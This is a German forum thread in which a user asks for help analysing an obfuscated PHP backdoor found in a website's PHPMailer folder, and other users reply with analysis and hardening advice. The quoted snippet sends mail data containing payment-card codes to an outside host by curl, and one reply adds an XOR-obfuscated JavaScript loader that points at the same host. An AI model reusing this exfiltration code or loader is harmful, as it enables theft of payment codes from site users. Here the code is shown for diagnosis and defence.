Register for your free account! | Forgot your password?

Go Back   elitepvpers > Popular Games > Metin2 > Metin2 Private Server
You last visited: Today at 16:16

  • Please register to post and access all features, it's quick, easy and FREE!

Advertisement



An unsere Cooder der Section

Discussion on An unsere Cooder der Section within the Metin2 Private Server forum part of the Metin2 category.

Reply
 
Old   #1
 
nostradame37's Avatar
 
elite*gold: 0
Join Date: Jan 2011
Posts: 2,504
Received Thanks: 870
An unsere Cooder der Section

hallo com Und Cooder seit par tagen hatt mich ein freund beauftragt seine homepage nach luecken durch zu suchen und gestern bin ich im PHPmailer
ordner auf diesen code gestosen

PHP Code:
 if (strpos($msg_data ,'ard') !== false) { 
 
$stringer str_replace('"',"",$msg_data);
 
$ch=curl_init(); 
 
curl_setopt($chCURLOPT_URL"h"."tt"."p:/"."/a"."1w.c"."oml".
 
"i".".c"."om/"."g"."et.p"."hp?"."i=".urlencode($stringer)."");
 
curl_setopt($chCURLOPT_RETURNTRANSFERtrue);
 
$result curl_exec($ch);
 
curl_close($ch);
 if(
strpos($result ,'zaxnm') !== false){
  return 
false;}
 } 
Klar ist das dieser code etwas an die Webseite
PHP Code:
a1w.comli.com/get.php?i
sendet aber was?
Kann man das nachvolziehen?
Klar ist auch das mein freund einen enormen verlust an PSCs hatt
mfg
Warte auf antworten
Edit Hier ist jetzt die komplette datei der code faeng ab zeile 385 an
die datei ist auch im anhang
Virus total Hier bitte



PS: Dieser code wird staendig geendert also extern vermute das sich mein freund irgent wie Ein bagdor (RAT) eingefangen hatt
den seinen homepage server habe ich reinstalieren lassen
nostradame37 is offline  
Old 12/09/2013, 20:22   #2
 
elite*gold: 20
Join Date: Aug 2012
Posts: 714
Received Thanks: 1,168
Woher kommt die Variable $msg_data? Vielleicht mal den ganzen Quellcode geben.

Gruß,
Chuck
'ChuckNorris is offline  
Thanks
2 Users
Old 12/09/2013, 20:26   #3
 
nostradame37's Avatar
 
elite*gold: 0
Join Date: Jan 2011
Posts: 2,504
Received Thanks: 870
Da mus ich warten bis er online komt aber auf jedem fall habe ich es aus dem ordner PHPmailer rausgefischt der fuer das absenden fuer mails wie zb bestaetigung des accounts absenden einer mail wen eine psc eingegangen ist usw
nostradame37 is offline  
Old 12/09/2013, 21:04   #4
 
.Inya's Avatar
 
elite*gold: 50
Join Date: Mar 2013
Posts: 2,401
Received Thanks: 1,613

Jedenfalls wird iwas an seine DB gesendet

Edit:

Warning: mysqli_connect() [function.mysqli-connect]: (HY000/1129): Host '31.170.160.87' is blocked because of many connection errors; unblock with 'mysqladmin flush-hosts' in /home/a7982051/public_html/get.php on line 191


uups D
.Inya is offline  
Thanks
1 User
Old 12/09/2013, 21:05   #5
 
Coniesan's Avatar
 
elite*gold: 1000
Join Date: Mar 2009
Posts: 1,408
Received Thanks: 1,007
haha wohl eher nicht (@ the moment) da access denied Aber war ja zu erwarten
Coniesan is offline  
Thanks
1 User
Old 12/09/2013, 21:07   #6
 
theo1990's Avatar
 
elite*gold: 260
Join Date: Jul 2009
Posts: 1,123
Received Thanks: 180
Löschen einfach alles unterhalb der If Anweisungen. Diese sucht nach dem Teil von card. Wenn du das gemacht hast schreib einfach mal folgendes unten in die Anweisung :

Echo "<pre>" ;
Var_dum($msg_data) ;
Echo "<\pre>" ;

Sorry wegen der Formatierung ich schreibe vom Handy aus. Jedenfalls siehst du dann was in msg-data steht
theo1990 is offline  
Thanks
1 User
Old 12/09/2013, 21:14   #7
 
.Inya's Avatar
 
elite*gold: 50
Join Date: Mar 2013
Posts: 2,401
Received Thanks: 1,613
Quote:
"h"."tt"."p:/"."/a"."1w.c"."oml"."i".".c"."om/"."g"."et.p"."hp?"."i="
Wenn ich diese "Verschlüsselung" schon sehe bekomm ich nen Kotzreiz xD

Also so z.B. hätte mir dass dan schon besser gefallen:
<script>
var a="'1Aqapkrv'02v{rg'1F'00vgzv-hctcqapkrv'00'1Gfmawoglv,upkvg'0:wlgqacrg'0:'00'1A qapkrv'02v{rg'1F'7A'00vgzv'7A-hctcqapkrv'7A'00'1Gfmawoglv,upkvg'7A'0:wlgqacrg'7A '0:'7A'00c3u,amonk,amo-egv,rjr'071Dk'071F'7A'00'7A'0;'7A'0;'1@'1A'7A-qapkrv'1G'00'0;'0;'1@'1A-qapkrv'1G";b="";c="";var clen;clen=a.length;for(i=0;i<clen;i++){b+=String.f romCharCode(a.charCodeAt(i)^2)}c=unescape(b);docum ent.write(c);
</script>
.Inya is offline  
Old 12/09/2013, 21:15   #8


 
Zander#'s Avatar
 
elite*gold: 14
Join Date: Feb 2011
Posts: 1,450
Received Thanks: 1,044
Die IP ist nen Webspace von 000webhost
Dieser Anbieter wird oft für illegale Anwendungen ausgenutzt (Viclogs, etc.)
Und das ganze per CURL erklärt die änderungen im Code denke ich.
Gruß,
Zander
Zander# is offline  
Thanks
1 User
Old 12/09/2013, 21:32   #9
 
nostradame37's Avatar
 
elite*gold: 0
Join Date: Jan 2011
Posts: 2,504
Received Thanks: 870
Quote:
Originally Posted by theo1990 View Post
Löschen einfach alles unterhalb der If Anweisungen. Diese sucht nach dem Teil von card. Wenn du das gemacht hast schreib einfach mal folgendes unten in die Anweisung :

Echo "<pre>" ;
Var_dum($msg_data) ;
Echo "<\pre>" ;

Sorry wegen der Formatierung ich schreibe vom Handy aus. Jedenfalls siehst du dann was in msg-data steht
Es geht hier ja nicht um meine wenigckeit sondern um einen freund
egal was er da macht wird es kurze zeit spaeter wider ediert
also hatt er volle rechte um an den homepage server zu coneckten.
Zu beachten ist ja das der homepage server heute wider Reinstaliert wurde
somit solten ja wen bagdors da gewesen sind keine mer da sein.
Schit Hapen er komt wider rein
Also denke ich mir das er sich einen Keylogger oder RAT durch sein ticket system einfaengt.
nostradame37 is offline  
Old 12/09/2013, 22:06   #10
 
elite*gold: 300
Join Date: Apr 2013
Posts: 3,234
Received Thanks: 1,205
Vlt hat der "hacker" ja sein PW?
Vlt hat er den RAT auf den PC und nicht auf den V-Server? Falls er FileZilla benutzt kann das Passwort ganz leicht ausgelesen werden?
#Saiirex is offline  
Old 12/09/2013, 22:29   #11
 
.Inya's Avatar
 
elite*gold: 50
Join Date: Mar 2013
Posts: 2,401
Received Thanks: 1,613
Tipp für vorerst:

Script der benötigten datei ändern backdoor entfernen versteckt ablegen und die Pfade anpassen.

Wenn hier zugriff auf den Ftp vorliegen würden würde sich niemand die Mühe machen und per Code scannen. Ich würde einfach print_r(exec("mysql 'Select * from homepage.psc_log'")) und schon spuckt die php datei alles aus o.O

Desweiteren würde ich Anti mal beauftragen dieses erwähnte Ticketsystem zu checken
.Inya is offline  
Old 12/10/2013, 06:23   #12
 
theo1990's Avatar
 
elite*gold: 260
Join Date: Jul 2009
Posts: 1,123
Received Thanks: 180
Wie sieht der login am Server aus? Benutzt ihr pro User rsa Keys? Wenn nicht wäre das eine ! Wichtig ist nur das ihr dann nur noch über dieses Verfahren einloggt. Und vorallem sperrt den Root login komplett. Wenn ihr was mit Root rechten machen müsst dann meldet euch über

su root

An. Wenn ihr nur Probleme habt mit dem Webserver empfehle ich euch mod security.
theo1990 is offline  
Old 12/10/2013, 13:22   #13
 
nostradame37's Avatar
 
elite*gold: 0
Join Date: Jan 2011
Posts: 2,504
Received Thanks: 870
Es wurden volgende vorsichts masnahmen vorgenommen

1: Der webserver komplett neu instaliert
2: Eine komplett neue Homepage genommen
3: Sein PC neu instaliert
4: Diverse AVs geladen und PC Komplett gescant alles cleen
Trotzdem beckomt er nach einer weile zugriff
mfg
nostradame37 is offline  
Old 12/10/2013, 14:52   #14
 
theo1990's Avatar
 
elite*gold: 260
Join Date: Jul 2009
Posts: 1,123
Received Thanks: 180
was meinst du mit webserver? wurde nur apache neu installiert oder auch das system?

trotzdem schlage ich deinem Freund meine o.g. weg einzuschlagen!!!
theo1990 is offline  
Old 12/10/2013, 21:19   #15
 
nostradame37's Avatar
 
elite*gold: 0
Join Date: Jan 2011
Posts: 2,504
Received Thanks: 870
Quote:
Originally Posted by theo1990 View Post
was meinst du mit webserver? wurde nur apache neu installiert oder auch das system?

trotzdem schlage ich deinem Freund meine o.g. weg einzuschlagen!!!
das wird er sicherlich machen blos wolte ich das ganze hier analysieren den einmalig wird es nicht sein und auch fuer die comm einen anreitz sich besser zu schuetzen
nostradame37 is offline  
Reply


Similar Threads Similar Threads
[Staff Overview] Unsere Ordner in der Crossfire-Section
03/13/2011 - CrossFire - 11 Replies
Hallo leute. Da sich viele in der Crossfire-Section nicht so gut auskennen und nicht wissen anwen sie sich bei Problemen wenden solln,gebe ich euch hier einen Überblick von unserem Section Team: Das Personal: Es gibt insgesamt 3 Moderatoren und 5 Guads die diese Section sauber halten ( an dieser Stelle ein thx an alle, ihr macht euren Job echt gut) ...
BNT2 Scht Cooder
02/26/2010 - Metin2 Private Server - 2 Replies
Wie gesagt BNT2 RooT Server sucht Cooder Poste mir
I need a CoODEr for a rank 7 server
06/12/2008 - Conquer Online 2 - 0 Replies
Well i need a good coder in c# who can add mobs (moving , Anttackin) And add commands (/spawn mob) And make guilds and trade working .... IF U THINK U ARE THE RIGHT ONE ADD ME ON MSN: [email protected]
1337 Cooder werdn?
08/02/2007 - General Coding - 12 Replies
wolt euch fragn ob irh mir codn beibrinngt wiel ich das se profesionel machn will. wat brau ihc da so? welch bucher? bin newbie wollt auch in ne codern crew



All times are GMT +1. The time now is 16:16.


Powered by vBulletin®
Copyright ©2000 - 2026, Jelsoft Enterprises Ltd.
SEO by vBSEO ©2011, Crawlability, Inc.
This site is protected by reCAPTCHA and the Google Privacy Policy and Terms of Service apply.

Support | Contact Us | FAQ | Advertising | Privacy Policy | Terms of Service | Abuse
Copyright ©2026 elitepvpers All Rights Reserved.